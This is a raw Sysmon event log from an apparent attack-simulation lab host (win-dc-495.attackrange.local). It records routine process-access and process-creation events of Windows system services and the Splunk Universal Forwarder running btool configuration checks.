13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE3-6005-B700-00000000A301}6641004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.251{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.217{59A5CD1D-8EE3-6005-BD00-00000000A301}45244504C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.983{59A5CD1D-8EE5-6005-CA00-00000000A301}24924300C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8EE5-6005-C900-00000000A301}45642484C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.750{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 